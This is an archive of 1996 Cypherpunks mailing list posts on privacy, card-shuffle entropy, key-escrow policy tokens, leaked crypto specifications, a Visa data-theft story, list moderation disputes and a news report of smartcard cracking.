Date: Tue, 19 Nov 1996 10:11:59 -0800 (PST)
To: "'IMCEAX400-c=GB+3Ba=+20+3Bp=CHEMSON+3Bo=CSH+3Bdda+3ASMTP=cypherpunks+40toad+2Ecom+3B@usweb.com>
Subject: RE: Unsubtroll
Message-ID: <c=US%a=_%p=USWeb_Corporatio%l=RACHEL-961119181113Z-2572@rachel.corp.usweb.com>
MIME-Version: 1.0
Content-Type: text/plain


uh....   I think the last 5 letters were a hint :-)

--
Daniel D. Todd
Technology Analyst
USWeb Corporation
408.987.3294

>----------
>From: 	Butler, Scott[SMTP:SButler@chemson.com]
>Sent: 	Tuesday, November 19, 1996 12:15 AM
>To: 	'cypherpunks@toad.com'
>Subject: 	FW: Unsubtroll
>
>
>
>FOR GOD'S SAKE !!!!!!!!!!!!!!!!!!
>
>>----------
>>From: 	piotrk@opnt.optimus.wroc.pl[SMTP:piotrk@opnt.optimus.wroc.pl]
>>Sent: 	19 November 1996 05:04
>>Subject: 	Unsubtroll
>>
>>>unsubtroll
>>
>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Blanc Weber <blancw@microsoft.com>
Date: Tue, 19 Nov 1996 10:24:02 -0800 (PST)
To: "'cypherpunks@toad.com>
Subject: RE: The Utility of Privacy
Message-ID: <c=US%a=_%p=msft%l=RED-81-MSG-961119182225Z-14929@INET-03-IMC.itg.microsoft.com>
MIME-Version: 1.0
Content-Type: text/plain


Isn't asking about the "utility of privacy" like asking about the
utility of having a self independent from others - a separate identity
of one's own, subject only to one's own command, with complete authority
to determine the occasion of its visibility?   

Is there anything justifiable about separating oneself from the company
of others and becoming non-visible to them, at those times when one is
out of their sight, away from their awareness of one's existence, of
one's activities, of one's thoughts & manners?

What do youall think you are, anyway?   Special?

   ..
Blanc

>
>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: abostick@netcom.com (Alan Bostick)
Date: Tue, 19 Nov 1996 11:49:05 -0800 (PST)
To: ph@netcom.com
Subject: Re: Playing Cards - Caution!
In-Reply-To: <v02140b00aeb6e056bb78@[192.0.2.1]>
Message-ID: <EMgky8m9Lkmb085yn@netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Note: I haven't read Diaconis's work; just some reports of it in the news
section of SCIENCE more than ten years ago, so people should take what
I say with more than a grain of salt.


In article <v02140b00aeb6e056bb78@[192.0.2.1]>,
ph@netcom.com (Peter Hendrickson) wrote:


> A few days ago I suggested that playing cards are a good source
> of entropy.  This was based on claim by Persi Diaconis which
> was quoted in The Economist.
> 
> I've researched the claim and I now believe it would be wise not to
> use playing cards as a source of entropy for cryptographic
> applications.
> 
> A fully random deck of 52 cards has about 225 bits of entropy.  That
> means that each riffle shuffle introduces about 32 bits of entropy.
> Intuitively, that seems like a lot of entropy for one riffle shuffle.
> I've tried a few riffle shuffles with a sorted deck.  While hardly
> scientific, the level of randomness does not look like 32 bits.  Most
> of the time the cards alternate.


Thirty-two bits of randomness in a space that is 225 bits wide leave
room for an awful lot of order.

Here is a (surely oversimplified) model of a less-than-perfect riffle
shuffle:  the deck is divided into two equal stacks, and the shuffler
typically introduces some number k of "errors" that result in a pair
of adjacent cards in the shuffled deck being exchanged (compared to 
a perfectly-shuffled deck).  In a fifty-two-card deck there are fifty-one
possible pairs to exchange.  log2(51) = 5.67, so we get 5.67 bits of 
entropy for each exchange, if the exchanges are distributed uniformly
through the deck.

How many exchanges are needed to get 32 bits of entropy?  That would
be 32/5.67 , or 5.64 .  In other words, to inject that much entropy into
the deck, only about six shuffling errors need to occur in the shuffle.
The vast remnant of the deck is going to be ordered, in the order that
comes from a perfect shuffle. We would expect to see, as you observe,
most of the cards in the deck alternating suit after one riffle shuffle.


> 
> The claim that 7 riffle shuffles of a deck of 52 cards will bring
> the deck to a state of near randomness appears in this book:
> 
> Diaconis, Persi "Group Representations in Probability and Statistics"
> Hayward, California: Institute of Mathematical Statistics, 1988.
> ISBN 0-940600-14-5
> 
> The section "An Analysis of Real Riffle Shuffles" begins on page 77.
> 
> A model is presented which Diaconis believes is similar to how people
> shuffle in real life.  What is troubling from a cryptographic point of
> view is that there is little empirical evidence to back this up.  What
> is more, Diaconis mentions that there is some variation in shufflers.
> A neat shuffler will be less random.  (Side note: The Economist claims
> Diaconis can execute 8 perfect shuffles in less than a minute.  This
> means the deck is returned to its original order!)

Mathematics does not rely on empirical evidence. ;-)

But bear in mind that Diaconis is a stage magician as well as a statistician,
and surely has a lot of direct personal experience with shuffling cards.
> 
> The study of randomness in cards looks much harder to me now.  Also,
> flaws which may be exploitable for financial reasons when real money
> is on the table may have to be substantially more dramatic than the
> flaws required to exploit, for instance, an alleged one-time pad.

Do bear in mind that, unless you distill its entropy through hashing,
a randomly-ordered deck of cards is going to show a lot of seemingly
non-random properties if you try to use it as a one-time pad.  Most
obviously, because each card in the deck is dealt once and only once,
there must of necessity be correlations between cards dealt early in
the deck and cards dealt later.  (Card-counters at blackjack tables
make their money by exploiting these correlations.)

> 
> Here's why I now prefer dice: Dice are simple.  Each die throw can be
> made to be quite independent of all other die throws.  Even loaded dice
> may be used by throwing them repeatedly and adding the results mod the
> number of sides to the die.  Dice which are suspect may be studied by
> repeated throwing.  Non-independence can be more easily studied as
> it can be assumed that a throw of the die is, at most, related only
> to the previous throw and none before.

The randomness of rolling dice is much more easy to interpret than that
of dealt cards.

Alan "Roll me and call me your tumbling dice" Bostick

-- 
Alan Bostick               | You know those chemicals women have in them,
                           | when they've got PMS? Well, men have those very
mailto:abostick@netcom.com | same chemicals in them *all the time*.
news:alt.grelb             |           Margaret Atwood, THE ROBBER BRIDE
http://www.alumni.caltech.edu/~abostick




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: <dwiley@pcy.mci.net>
Date: Tue, 19 Nov 1996 07:59:22 -0800 (PST)
To: cypherpunks@toad.com
Subject: Stolen PC has Credit-Card accounts data
Message-ID: <Pine.GSO.3.95.961119104949.22495B-100000@magilla.pcy.mci.net>
MIME-Version: 1.0
Content-Type: text/plain



Might wana check out http://www.usatoday.com/money/mds7.htm.

It seems to me that things like this are a bigger threat than actual
attacks by wire.  But I guess Visa was not concerned about their physical
security. Oh well.....To bad for the 314,000 people. Gota love security.
To bad it sounds like the person that stole the PC had little or no
knowladge of what was on the PC. I love this line.....


"Melancon said the account information wasn't encoded but was in
compressed form and not easy for someone outside the Visa system to read."


So I guess uncompress or gunzip might work..:)
Dan





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Tue, 19 Nov 1996 07:59:55 -0800 (PST)
To: cypherpunks@toad.com
Subject: Used to Be
Message-ID: <3.0b36.32.19961119105900.006b3e00@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


Used to be that if you wanted dirty words or pictures, you had to go to Paris.

Used to be that if you wanted Nazis, you had to go to Deutschland.

Used to be that if you wanted to know how to blow things up, you had to go
to the US Government Printing Office.

Used to be that if you wanted racists, you had to go to Alabama.

Used to be that if you wanted commies, you had to go to Moscow (or at least
the LSE).

Used to be that if you wanted garrulous bores, you had to go to you local
watering hole.

Used to be that if you wanted child molesters you had to go to your local
public school.

Used to be that if you wanted a cop you had to go to the nearest doughnut
shop.

Now you can get all of the above and more from the privacy of your own home
on the Internet.

DCF

  




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Tue, 19 Nov 1996 08:01:02 -0800 (PST)
To: "Timothy C. May" <cypherpunks@toad.com
Subject: Re: "Right to Privacy" and Crypto
Message-ID: <3.0b36.32.19961119105646.00689b68@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


Just cleaning up old responses to old messages:

Sometimes I will see long articles on subpoenas, contempt of court, and
compelled testimony in which no one mentions the fact that the only
sanction used is a little bit of imprisonment (two years seems to be the
max).  That's for things you know.  Since software can be made harder to
compel than people, a properly configured system (sort of like a
spendthrift trust where you can't get at it when compelled) may allow you
to dodge sanctions entirely.

Once we get better at human programming, it should be possible to make our
nervous system a secure system that can't respond when coerced.  This can
already be done by conscious self programming in individuation.  I
certainly try to do that.

Studies of the effects of North Korean brainwashing on different types of
POWs showed a wide variability in susceptibility.  Likewise studies of
Moonie brainwashing.  Political "moderates" with little or no ideology find
it hard to resist coercion.  "You can't fight something with nothing."  In
Korea, the prisoners from Turkey, proved impossible to brainwash.  They had
a mental toughness, a tradition of self posession, and a tolerance for
physical discomfort that strengthened their defenses.  Most U.S. Moonie
recruits were from squishy liberal households (like Barbara Underwood of
the Moonie 5 trial).  

I am not as physically tough as a Turkish soldier but I am certainly tough
ideologically.  In resisting coercion I use a form of "name magic" to
strengthen me and weaken the opposition.  If you can control the naming of
an act or a relation, you can dominate the situation even if you are in a
weaker position.  

Thus when Moonie recruiters approached me at the No. 10 Monterey bus stop
in front of the California Academy of Sciences in Golden Gate Park in SF
with their usual "Hi sailor, new in town?" approach ("Are you from out of
town?  We live with a group of people.  Would you like to come to dinner?);
I responded "I'm not interested in the Reverend Moon."  They left me alone.

When confronting con artists, I usually name the general category name of
their cons:  "Spanish Prisoners," "Shell Game," "Bank Examiners Con," etc.

Naming works with the Geheime Staatspolizei as well.  "You can't park
here."  "I'm not parking, I'm standing."  "Well you can't stand here
either."  "OK."

"In nature it's kill or be killed.  In politics it's define or be defined."
-- Szaz

DCF




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Tue, 19 Nov 1996 11:30:48 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Rogue Governments Issuing Policy Tokens
In-Reply-To: <199611191649.IAA00949@crypt.hfinney.com>
Message-ID: <v03007800aeb7b8522b6a@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 8:49 AM -0800 11/19/96, Hal Finney wrote:
>From: "Timothy C. May" <tcmay@got.net>
>> The problem (for GAK) of "rogue governments" is this: a government such as
>> Libya or Panama, henceforth to be known as "Rogueitania," issues policy
>> cards to all of its citizens, and to all those visiting Rogueitania, and
>> perhaps through the mail to anyone who pays some fee.
>
>I don't think this would happen.  Some kind of secret information or
>hardware is going to be needed to create policy tokens.  (Otherwise
>anybody could make one.)  That means that HP, and therefore ultimately
>the U.S. government, is going to have to approve those governments which
>are allowed to issue such tokens.  HP will have to provide them some
>special hardware or something to make them.  The tokens will only be
>accepted if they have proper secrets inside them.

But even such "U.S. approval" is fraught with problems (for the U.S. and
for public relations). Some examples:

- Arab boycott of Israel...will U.S. be complicit in helping the machinery
of the boycott run? (Actually, H-P could run afoul of several U.S. laws...)

- Myanmar (Burma) wants the evil dissidents controlled (a case much
discussed by PRZ). Which side will the U.S. support?

(As noted in the Declan story, the machinery of having government issue
policy cards, if successful, essentially blocks dissidents and
revolutionaries from gaining certain powers. The U.S. _used_ to support
dissidents and revolutionaries in various countries...no longer, I guess.
The price of winning the Cold War: complacency.)

- Many countries trade with Cuba, while the U.S. does not. So, which side
of this dispute does a U.S.-approved policy token support?

(By the way, Canada is one such nation. If Canada gets the key to issuing
policy tokens, they can issue them to those travelling to Cuba on business.
This would make them a "rogue government" vis-a-vis U.S. policy. More
serious examples also exist.)

And so on. Except for a very few countries which are closely aligned with
U.S. policy on nearly every issue, most countries have internal and
external policies with which we as a nation have serious disagreements.

In fact, for nearly every country to which policy tokens are to be licensed
and approved, the U.S. would have to make some policy decisions which are
bound to offend one group or another. And take time. And raise issues here
in the U.S. Take any country, even nominal allies, and these internal
issues are very thorny indeed.


>I can't see the U.S. allowing Libya and similar countries to create policy
>tokens.  The whole point of this exercise is to prevent these countries
>from being able to use strong crypto.  So they will certainly not be on
>the approved list.

I mention Libya as an extreme example (the same example cited in the
Fiat-Shamir "is-a-person" example of rogue governments issuing passports).
The examples above are likely targets for policy card exports, though. The
issue is clear: the list of "fully-compliant" nations is short indeed, and
few nations are going to accept imports of U.S. technology in which the
U.S. government sets the policy on how and where the imports may be used.

I think this will kill "policy tokens" as a viable U.S. export. This,
actually, may be the expected outcome. ("Hey, we gave you permission to
export this stuff...we can't help it if no other countries allow their
citizens to import the stuff.")

>For these reasons I don't think the HP idea solves the export problem
>for U.S. hardware and software makers.  And the response by opinion leaders
>has ranged from ho-hum to negative, despite the self-serving cheerleading
>by HP management.  Companies which try to sell computers with these chips
>in them risk getting a "big brother inside" (to use Tim's very effective
>slogan) reputation.  I think this initiative is going nowhere.

Yes, ironic that the orginal "Big Brother Inside" logo I showed was of
course based on the "Intel Inside" logo...and now Intel is actually
involved in this mess. How appropriate.

Time to dust off those "Big Brother Inside" stickers someone had printed up
a couple of years ago.

--Tim May

"The government announcement is disastrous," said Jim Bidzos,.."We warned IBM
that the National Security Agency would try to twist their technology."
[NYT, 1996-10-02]
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Tue, 19 Nov 1996 08:38:37 -0800 (PST)
To: cypherpunks@toad.com
Subject: CAVE Query
Message-ID: <1.5.4.32.19961119163629.006c216c@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


We've received by black bag a 25-page doc entitled:

     TR45.3, Appendix A to IS-54,  Rev. B

     Dual-Mode Cellular System

     Authentication, Message Encryption, Voice Mask
     Generation, A-Key Verification, and Test Data

     February, 1992. No Source.

It describes the CAVE cryptographic function in detail,
and its use to generate a set of cryptovariables for the 
Cellular Message Encryption Algorithm (CMEA); for 
generation of 520 bits for the duplex voice privacy masks; 
and for other tasks.

Each page warns that information in the document may be
subject to export jurisdiction under ITAR.

Does anyone know if this is already available on the
Web?

TIA of incarceration.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ben Laurie <ben@gonzo.ben.algroup.co.uk>
Date: Tue, 19 Nov 1996 04:57:11 -0800 (PST)
To: John Young <jya@pipeline.com>
Subject: Re: Securing Electronic Mail Within HMG
In-Reply-To: <1.5.4.32.19961119074914.006a7368@pop.pipeline.com>
Message-ID: <9611191154.aa26615@gonzo.ben.algroup.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


John Young wrote:
> 
> We have received from an anonymous source a document titled:
> 
> "Securing Electronic Mail Within HMG, Part I, Infrastructure 
> and Protocol." 21 March 1996.
> 
> From the Introduction:
> 
> "This document is the first part of CESG's recommendations for 
> securing electronic mail within HMG. The main objective of the 
> recommendations is to facilitate pan-government secure inter-
> operability of electronic mail, by simplifying the implementation 
> of secure electronic mail within government, ensuring secure 
> electronic mail between departments is possible, attempting to 
> facilitate future inter-operability with commercial users,
> maximising the use of commercial technology in a controlled manner,
> whilst allowing access to keys for data recovery or law enforcement 
> purposes if required."
> 
> Other sections describe:
> 
> 2. Authentication Framework
> 
> 3. Confidentiality Framework
> 
> 4. Security Protocol
> 
> The document refers to the Royal Holloway program for TTP critiqued 
> by Ross Anderson and others as "EuroClipper." Perhaps those with 
> more knowledge could make an assessment.
> 
> The document consists of 13 pages of text and diagrams, with 
> a few gaps.

This document is available on the Web, at:

http://www.xopen.org/public/tech/security/pki/casm/casm.htm

see also my "addendum" to Anderson & Roe's paper (which is actually a critique
of the above proposal, rather than RH itself) at:

http://www.algroup.co.uk/crypto/rh.html

Cheers,

Ben.

-- 
Ben Laurie                Phone: +44 (181) 994 6435  Email: ben@algroup.co.uk
Freelance Consultant and  Fax:   +44 (181) 994 6472
Technical Director        URL: http://www.algroup.co.uk/Apache-SSL
A.L. Digital Ltd,         Apache Group member (http://www.apache.org)
London, England.          Apache-SSL author




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Tue, 19 Nov 1996 10:06:42 -0800 (PST)
To: cypherpunks@toad.com
Subject: Monitor Radio Talks Crypto-FUD
Message-ID: <v0300782eaeb79dee2076@[206.119.69.46]>
MIME-Version: 1.0
Content-Type: text/plain


The FUDgine keeps rolling down the track...

Looks like Monitor Radio's promoting 56-bit encryption. Reporter's name is
Duncan Moon.

Quotes a guy quoting Blaze (not mentioning Matt). Calls 56 bit encryption
"puny in the future", but not now.

The article talks about hardware as giving keylength economic legs, with
some logic I can't quite fathom...

Cheers,
Bob

-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"The cost of anything is the foregone alternative" -- Walter Johnson
The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Tue, 19 Nov 1996 15:14:41 -0800 (PST)
To: boursy@earthlink.net
Subject: wealth and property rights
In-Reply-To: <3291C46F.142A@earthlink.net>
Message-ID: <199611191237.MAA00639@server.test.net>
MIME-Version: 1.0
Content-Type: text/plain



Steve Boursy <boursy@earthlink.net> writes:
> Dale Thorn wrote:
> > But are you suggesting that if I trade my labor for some material item
> > which was built with other people's labor, and that material item is
> > sufficiently portable that it doesn't have to occupy a significant
> > piece of real estate (i.e., a house, a large boat), *they* should be
> > able to take that material item away from me anyway on whatever pretext,
> > on the basis that possession of it is a *privilege*?  Is my paycheck,
> > given to me directly for my labor just a privilege?
> 
>   That's a fair question.  I don't begrude one's ownership of their
> fair share--but I do have serious problems with what we shall
> call 'accumulators' if you will.  For them I have contempt and no--
> they do not have that right of possession and often such 'work' is
> at the expense and on the backs of others.

I'm an accululator :-)

The investments I have I worked for.  The investments I have are as a
result of forgone immediate pleasures (no flash cars, foreign
holidays, no hire-purchase, no consumer electronics etc).  You
probably would look down on my current "standard of living" (something
real life aquaintances like to rib me about).

See, if you spend your money now, on the above, you have no right to
criticize me when I look relatively wealthy later.  It's your choice
to blow your money.

Btw, people of your mentality (communists/socialists) already make it
very difficult for me to accumulate, due to the exhorbitant tax rates
to support those who chose to blow their money as soon as they have it
(or often _before_ they have it, incurring 25% APR credit card
interest rates on top).

For the list of abusive taxation regimes thread: UK tax rates are 24%
basic, 40% higher rate.  Plus 10% national insurance `contributions'
(compulsory state pension payments).  Plus 17.5% VAT.  Plus property
tax.  Plus `capital gains' tax (at either 24% or 40%, the same as
whatever income tax rate you're on).  Plus ~400% Fuel tax rates
(petrol is L 2.76 / imperial gallon which is 3.66 US $ / US gallon!).

Adam
--
print pack"C*",split/\D+/,`echo "16iII*o\U@{$/=$z;[(pop,pop,unpack"H*",<>
)]}\EsMsKsN0[lN*1lK[d2%Sa2/d0<X+d*lMLa^*lN%0]dsXx++lMlN/dsM0<J]dsJxp"|dc`




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Hayes <dave@kachina.jetcafe.org>
Date: Tue, 19 Nov 1996 12:41:42 -0800 (PST)
To: freedom-knights@jetcafe.org
Subject: Re: Does John Gilmore...
Message-ID: <199611192041.MAA04325@kachina.jetcafe.org>
MIME-Version: 1.0
Content-Type: text/plain


Black Unicorn writes:
> Dave Hayes writes:

> > > Again, you confuse free speech with free broadcast.
> > Isn't broadcast a subset of speech, especially in this culture?
> That which is broadcast is certainly speech.
> Trying to draw some kind of "right to be broadcast" as a result is
> stupidity or ignorance, or both.

Then I suppose you want to control all mailing lists, USENET groups,
and web pages. These are broadcasts, and of course they have no rights
other than what you seem to want to give them.

> Anyone has the right to, e.g., start a mailing list, or a newsletter.
> No one has the right to compell ABC or FOX or John Gilmore or anyone
> else to broadcast their speech.  (The rarest exceptions, like equal time
> rules, exist in election contexts).

But what about this letter? It is cc'd to two mailing lists. I own the
Freedom Knights one, John Gilmore owns the cyperpunks one. Does that
mean that both of us have to approve it before it gets sent? Do we
both own it?

> Learn the difference.  Go to law school before you argue free speech
> concepts in any detail.  

"Laws" do not cover the net's "multicast" technology.

Distinguishing communication types so as to control those who use them
is not going to solve your problem. You are much better off, from a
practical standpoint, learning to control what you see and hear rather
than attempting to control others. 

One does not need a school to see this, it sits under one's nose like
a milk moustache.
------
Dave Hayes - Altadena CA, USA - dave@jetcafe.org 
Freedom Knight of Usenet - http://www.jetcafe.org/~dave/usenet

                 One only fights what one thinks is real.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lucky Green <shamrock@netcom.com>
Date: Tue, 19 Nov 1996 12:44:54 -0800 (PST)
To: "Dana W. Albrecht" <dwa@corsair.com>
Subject: Re: Taking out the garbage
In-Reply-To: <199611191733.JAA19742@vishnu.corsair.com>
Message-ID: <Pine.3.89.9611191201.A27439-0100000@netcom6>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 19 Nov 1996, Dana W. Albrecht wrote:

> 
> 
> I'd like to point out that accepting posts from those who are not
> technically subscribed to the list is not always a bad idea.

I agree. I am not suggesting that non-subscribers should be blocked from 
posting to the list. Nor am I claiming that non-subscribers post a higher 
rate of garbage to the list. All I am saying is that I will bounce 
garbage originating from non-subscriber and subscriber alike back to the 
authors. I encourage others on the list choose to do the same.

--Lucky




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Clay Olbon II <clay.olbon@dynetics.com>
Date: Tue, 19 Nov 1996 10:05:00 -0800 (PST)
To: "George A. Stathis" <cypherpunks@toad.com>
Subject: Reputation based hiring (was REQUESTING INFORMATION)
Message-ID: <1.5.4.32.19961119180257.006c2bb4@ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 05:12 PM 11/19/96 -0200, George A. Stathis wrote (in part):

>Does your "unemployment list" include Doctor Dimitri Vulis? I'd be greatful
>to know this.
>Please, seriously now, and if you have such evidence (that
>Dimitri is 'lazy', 'stupid' or 'dishonest') send to me if you can...

I won't comment on who I will or won't hire.  I will state that I believe
that what a person posts is a relevant issue when it comes time to make a
hiring decision.  Hiring is based on many factors other than simply
technical ability. If someone thinks that another should not be hired for
whatever reason, I support their right to hold that belief and even to
publicize it.  

<rant against cypherpunks deleted>

I won't follow you into the gutter on this one.  That horse has been dead
for days (and it is beginning to smell really bad).

        Clay

*******************************************************
Clay Olbon			    olbon@ix.netcom.com
engineer, programmer, statistitian, etc.
**********************************************tanstaafl







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <rcgraves@ix.netcom.com>
Date: Tue, 19 Nov 1996 13:53:17 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: The Utility of Privacy
In-Reply-To: <Pine.SUN.3.94.961118185330.29557A-100000@polaris>
Message-ID: <32922C21.438E@ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Black Unicorn wrote:
> 
> On Mon, 18 Nov 1996, Sandy Sandfort wrote:
> 
> > The problem with having a whole lot of private information about
> > you floating around in public is not what damage it can do to you
> > now, but rather the problems it potentially could cause in the
> > future.  Just about everyone on this list has been to university.
> > Not long ago, a college education was essentially a death warrant
> > in Cambodia....
> 
> Oh, come on.  That could never happen here.

[Where is "here" for every list member?]

Not bloody likely, no, but Mr. Kasczynski or the Symbionese Liberation
Army could take a disliking to you for similar reasons. And you never 
know where you might travel. I've got a journalist friend who's paranoid 
about appearing at any political event because she's afraid she won't be 
allowed back into China or Southeast Asia if it comes out that she gives 
a damn about human rights.

A seasonal haiku, original author unknown:

Open your present
No, you open your present
Kasczynski Christmas

-rich




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cyberhawk <cyberhawk@mailmasher.com>
Date: Tue, 19 Nov 1996 14:26:26 -0800 (PST)
To: shamrock@netcom.com
Subject: Lucky your no punk...
Message-ID: <199611192226.OAA19091@mailmasher.com>
MIME-Version: 1.0
Content-Type: text/plain


 Lucky Green <shamrock@netcom.com> writes:
 > Beginning Monday, 11/25/96, I will bounce all email from the various
 > (non-)subscribers polluting this list with garbage back to the
 > authors. Furthermore, I will attach documents describing basic
 > Internet rules of conduct to each bounce.
 >
 > I would encourage other Cypherpunks to do the same.

Lucky:

Are you an elitist cypherpunk? It sounds like you've out grown the designation
of punk.

Punk:   1. worthless or unimportant person. 2. a petty hoodlum -adj, 3. poor
in quality.

You are hereby promoted.  You are now a cypher-corporal in the elite crypto
army.  God Speed my boy.

We'll keep a candle lite for you son if you someday choose to return to the
great un-washed masses.

Chow-baby,

Rocky J. Squirrel




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Tue, 19 Nov 1996 11:24:57 -0800 (PST)
To: cypherpunks@toad.com
Subject: Cyber Power in Forbes
Message-ID: <3.0b36.32.19961119142606.0076577c@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


Dayglo Yellow on dayglo pink cover of the December 2, 1996 Forbes.

Wired Envy.

       CYBER POWER
gives financial markets a veto
over the President and Congress
     by Peter Huber


DCF




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ian Grigg <iang@systemics.com>
Date: Tue, 19 Nov 1996 06:16:42 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Crypto Bounties
In-Reply-To: <199611190406.XAA26146@alpha.pair.com>
Message-ID: <3291C196.167EB0E7@systemics.com>
MIME-Version: 1.0
Content-Type: text/plain


azur@netcom.com wrote:
>  Why not the free market rate the programmers.  Have a software
>  distribution/payment collection system which requires that the programmer
>  get a completion bond from a 3rd-part insurance company.  If the programmer
>  fails to deliver as promised and/or on-time the donding company pays the
>  'investors' back in full. Since the bonding company's money would be at
>  risk, if the programmer failed to deliver, they have every incentive to
>  conservatively rate the programmers/companies offering ot build SW to spec.

What you are essentially doing is buying reputation I guess, although I
am not familiar with completion bonds, so I the following is mostly
conjecture on their nature.

There are two major feature/bugs with the completion bond.  Firstly, it
requires the bonding company to make a judgement, and this adds a weak
point into the link.  That judgement will then result in a lot of
emphasis on the fine print of the contract, and fundamentally, software
doesn't work very well when fine print gets involved.  The notion of
"completion" especially sits oddly with the scenario described, where
freeware of mostly source form gets distributed to a wide group of
programmers who can adjust minor problems fairly easily.  I would guess
that when EDS delivers a product, there are completion ("penalty")
clauses, but when the Internet was "delivered" there was no such clause.

Secondly, the existance of an intermediary points to a major
inefficiency in the market.  Whilst your joy at paying intermediaries
may vary, historically, intermediaries follow a pattern of building
barriers to entry, raising charges, and slowing innovation.  This is
theory that is generally applicable in practice, and it is for this
reason that the emphasis in my post was on removing the single point of
guaruntee.  In the context, I would also question the nature of a
financial entity that was willing to sell its reputation to
cryptoanarchists.

>  >[slash]  However, I like this viewpoint because it
>  >eliminates the need for judges.  History shows that a good market
>  >microstructure will beat an authority approach in the long run.

By aiming for no single point of judgement, the only solution that we
found was to rely on a multi-shot game, with past reputation leading to
up-front payment leading to confirmation of reputation.  As it happens,
the bonding companies will rely heavily on reputation as well, in its
varying forms, anyway.

snow@smoke.suba.com originally asked:
>  >> Has anything like this been proposed before?
> 
>  Yes, Eric Hughes proposed a broad and structured proposal primarily
>  addressing this manner of market funding for software development (and
>  possibly suitable for other intellectual property creation) at DEFCON IV.
>  My previous comments on completion bonds were taken from his presentation.

Yes, I saw that earlier post, and did a quick search for it but no
luck.  If any one can point us at the paper, that would be useful.

On a slightly related note - is there any interest in setting up a
mailgroup for programmers and designers of markets?  There's plenty of
cash stuff out there but I know of no forums for trading of fungible
items.
-- 
iang
iang@systemics.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Tue, 19 Nov 1996 12:29:09 -0800 (PST)
To: Duncan Frissell <cypherpunks@toad.com
Subject: Re: Cyber Power in Forbes
In-Reply-To: <3.0b36.32.19961119142606.0076577c@panix.com>
Message-ID: <v03007845aeb7c86905e8@[206.119.69.46]>
MIME-Version: 1.0
Content-Type: text/plain


At 2:27 pm -0500 11/19/96, Duncan Frissell wrote:
>Dayglo Yellow on dayglo pink cover of the December 2, 1996 Forbes.
>
>Wired Envy.
>
>       CYBER POWER
>gives financial markets a veto
>over the President and Congress
>     by Peter Huber

Glad to know that St. Pete keeps his hand in...

Cheers,
Bob Hettinga

-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"The cost of anything is the foregone alternative" -- Walter Johnson
The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Z.B." <zachb@netcom.com>
Date: Tue, 19 Nov 1996 17:42:53 -0800 (PST)
To: Cypherpunks List <cypherpunks@toad.com>
Subject: Cracks Are Found In Smartcard Security (fwd)
Message-ID: <Pine.3.89.9611191551.A25119-0100000@netcom>
MIME-Version: 1.0
Content-Type: text/plain


[This was on the Defcon list...apologies if it's already been posted today.]


Zach Babayco 

zachb@netcom.com <-------finger for PGP public key
http://www.geocities.com/SiliconValley/Park/4127
-----
If you need to know how to set up a mail filter or defend against 
emailbombs, send me a message with the words "get helpfile" (without the 
" marks) in the SUBJECT: header, *NOT THE BODY OF THE MESSAGE!*  I have 
several useful FAQs and documents available.


---------- Forwarded message ----------
Date: Tue, 19 Nov 1996 21:17:49 +0000
From: Simon Gardner <simon@access.org.uk>
To: aaa-list@access.org.uk
Cc: dc-stuff@dis.org
Subject: Cracks Are Found In Smartcard Security

Cracks Are Found In Smartcard Security


Researchers have found a way to attack tough codes, says Michael
McCormack.

A team of Cambridge and German researchers have used ordinary hacking
methods and £150 worth of electronics equipment to crack the "world's
most secure computer chip", used in automated teller machines worldwide.

They say their technique could be used to reprogram a wide variety of
supposedly secure smartcard applications, including the Mondex "money on
a card" bankcard, GSM phones, and satellite TV descramblers.

